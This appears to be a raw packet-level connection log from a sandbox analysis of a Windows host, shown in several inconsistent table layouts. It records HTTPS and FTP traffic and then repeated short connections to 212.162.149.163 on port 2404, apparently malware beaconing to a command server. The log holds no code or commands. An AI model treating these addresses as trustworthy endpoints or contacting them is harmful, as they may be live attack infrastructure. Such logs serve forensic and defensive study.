Oct 3, 2024 09:28:19.890971899 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.891020060 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.894045115 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.894118071 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.894201994 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.895596027 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.976304054 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.976397038 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.976412058 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.976427078 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.976464987 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.976470947 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.976480007 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.976528883 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.976629019 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.976685047 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.976772070 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.976828098 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.976844072 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.976903915 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.977015972 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.977067947 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.977260113 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.977324963 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.977418900 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.977478981 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.977587938 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.977631092 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.977639914 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.977646112 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.977674961 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.981698990 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.981767893 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.981868029 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.981919050 CEST  49719        443        192.168.2.6      173.231.247.100
                                Oct 3, 2024 09:28:19.982134104 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.982191086 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.982901096 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.982953072 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.983063936 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.983124971 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064707994 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064755917 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064773083 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064789057 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064821005 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064826965 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064840078 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064843893 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064872980 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064894915 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064922094 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064966917 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065150023 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.065195084 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065323114 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.065398932 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065404892 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.065417051 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.065452099 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065474987 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065649033 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.065699100 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065987110 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066034079 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.066138983 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066193104 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.066198111 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066255093 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.066258907 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066318035 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.066585064 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066641092 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.066740036 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066791058 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.071472883 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.071543932 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.071579933 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.071628094 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153158903 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153234959 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153243065 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153259039 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153280020 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153285980 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153299093 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153302908 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153330088 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153361082 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153489113 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153547049 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153641939 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153708935 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153810024 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153865099 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153981924 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154046059 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154149055 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154205084 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154253960 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154314041 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154567957 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154619932 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154686928 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154747963 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154890060 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154939890 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154947042 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.155016899 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.155183077 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.155241013 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.159703970 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.159761906 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.160335064 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.160406113 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.241641998 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.241723061 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.241749048 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.241800070 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.241934061 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.241996050 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.242007971 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.242058992 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.242217064 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.242252111 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.242269039 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.242275000 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.242315054 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.242316008 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.242377996 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.242697954 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.258150101 CEST4971521192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:20.258320093 CEST4971121192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:20.262964010 CEST2149715191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:20.480519056 CEST2149715191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:20.481161118 CEST4972160509192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:20.486017942 CEST6050949721191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:20.487404108 CEST4972160509192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:20.487405062 CEST4971521192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:20.492326975 CEST2149715191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:20.710704088 CEST2149715191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:20.852370977 CEST4971521192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:21.101475000 CEST2149715191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:21.101907015 CEST6050949721191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:21.102036953 CEST6050949721191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:21.104288101 CEST4972160509192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:21.105557919 CEST4972160509192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:21.110831022 CEST6050949721191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:21.113929033 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:21.113977909 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:21.114053965 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:21.118305922 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:21.118325949 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:21.152345896 CEST4971521192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:21.594981909 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:21.596285105 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:21.596313000 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:22.004806995 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:22.004930973 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:22.004988909 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:22.005292892 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:22.153609037 CEST4971521192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:23.407372952 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.407437086 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:23.407536030 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.411376953 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.411412954 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:23.871898890 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:23.871975899 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.923412085 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.923448086 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:23.923831940 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:23.940798998 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.987416983 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:24.488431931 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:24.488535881 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:24.488604069 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:24.489475012 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:24.681642056 CEST497252404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:24.686753035 CEST240449725212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:24.686933994 CEST497252404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:24.687916994 CEST497252404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:24.692799091 CEST240449725212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:26.185148001 CEST240449725212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:26.185230970 CEST497252404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:26.185309887 CEST497252404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:26.190119028 CEST240449725212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:27.196548939 CEST497262404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:27.201637030 CEST240449726212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:27.201709032 CEST497262404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:27.202095032 CEST497262404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:27.207058907 CEST240449726212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:27.751487017 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:27.751523972 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:27.751596928 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:27.755479097 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:27.755496025 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.233577967 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.233680964 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:28.235183001 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:28.235200882 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.235467911 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.241941929 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:28.287412882 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.365071058 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.365225077 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.365287066 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:28.366473913 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:28.696204901 CEST240449726212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:28.696275949 CEST497262404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:28.696376085 CEST497262404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:28.701366901 CEST240449726212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:29.712543964 CEST497292404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:29.717639923 CEST240449729212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:29.719142914 CEST497292404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:29.719551086 CEST497292404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:29.724337101 CEST240449729212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:31.200728893 CEST240449729212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:31.200798988 CEST497292404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:31.200861931 CEST497292404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:31.209461927 CEST240449729212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:32.221999884 CEST497302404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:32.236903906 CEST240449730212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:32.236990929 CEST497302404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:32.237385988 CEST497302404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:32.248251915 CEST240449730212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:33.713100910 CEST240449730212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:33.713176012 CEST497302404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:33.713224888 CEST497302404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:33.719793081 CEST240449730212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:34.731566906 CEST497312404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:34.737783909 CEST240449731212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:34.737900972 CEST497312404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:34.741502047 CEST497312404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:34.747100115 CEST240449731212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:35.174355984 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.174432993 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.174519062 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.176908970 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.176922083 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.686245918 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.686353922 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.687767982 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.687777996 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.688075066 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.693913937 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.739408016 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.845540047 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.845644951 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.845696926 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.846471071 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:36.222244024 CEST240449731212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:36.223417044 CEST497312404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:36.223417044 CEST497312404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:36.233028889 CEST240449731212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:37.237345934 CEST497332404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:37.257577896 CEST240449733212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:37.257668972 CEST497332404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:37.263282061 CEST497332404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:37.273515940 CEST240449733212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:38.724689960 CEST240449733212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:38.724754095 CEST497332404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:38.724809885 CEST497332404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:38.730110884 CEST240449733212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:39.728118896 CEST497342404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:39.736846924 CEST240449734212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:39.736953020 CEST497342404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:39.737467051 CEST497342404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:39.745969057 CEST240449734212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:41.229326963 CEST240449734212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:41.229469061 CEST497342404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:41.229984999 CEST497342404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:41.238605022 CEST240449734212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:42.253864050 CEST497352404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:42.259335995 CEST240449735212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:42.259437084 CEST497352404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:42.259850979 CEST497352404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:42.265372992 CEST240449735212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:43.763794899 CEST240449735212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:43.763906002 CEST497352404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:43.763962984 CEST497352404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:43.783535004 CEST240449735212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:44.776401997 CEST497362404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:44.783514023 CEST240449736212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:44.783610106 CEST497362404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:44.783981085 CEST497362404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:44.789810896 CEST240449736212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:46.301676035 CEST240449736212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:46.301906109 CEST497362404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:46.301906109 CEST497362404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:46.337704897 CEST240449736212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:47.306060076 CEST497372404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:47.321175098 CEST240449737212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:47.322340965 CEST497372404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:47.323436975 CEST497372404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:47.339312077 CEST240449737212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:48.803081036 CEST240449737212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:48.803248882 CEST497372404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:48.803248882 CEST497372404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:48.808595896 CEST240449737212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:49.806391001 CEST497392404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:49.811424017 CEST240449739212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:49.811549902 CEST497392404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:49.811942101 CEST497392404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:49.816745996 CEST240449739212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:51.312752008 CEST240449739212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:51.312962055 CEST497392404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:51.312962055 CEST497392404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:51.317861080 CEST240449739212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:52.321619034 CEST497402404192.168.2.6212.162.149.163
Oct 3, 2024 09:28:52.326723099 CEST | 2404 | 49740 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:52.326814890 CEST | 49740 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:52.327187061 CEST | 49740 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:52.332014084 CEST | 2404 | 49740 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:53.793616056 CEST | 2404 | 49740 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:53.793688059 CEST | 49740 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:53.793735981 CEST | 49740 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:53.802285910 CEST | 2404 | 49740 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:54.806118011 CEST | 49741 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:54.811232090 CEST | 2404 | 49741 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:54.811336040 CEST | 49741 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:54.811709881 CEST | 49741 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:54.816545010 CEST | 2404 | 49741 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:56.314996004 CEST | 2404 | 49741 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:56.315129995 CEST | 49741 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:56.315176964 CEST | 49741 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:56.319987059 CEST | 2404 | 49741 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:57.321887016 CEST | 49743 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:57.327008963 CEST | 2404 | 49743 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:57.327100039 CEST | 49743 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:57.327487946 CEST | 49743 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:57.332289934 CEST | 2404 | 49743 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:58.805047989 CEST | 2404 | 49743 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:58.805154085 CEST | 49743 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:58.805236101 CEST | 49743 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:58.809967041 CEST | 2404 | 49743 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:59.815257072 CEST | 49744 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:59.820178032 CEST | 2404 | 49744 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:28:59.820257902 CEST | 49744 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:28:59.820733070 CEST | 49744 | 2404 | 192.168.2.6 | 212.162.149.163
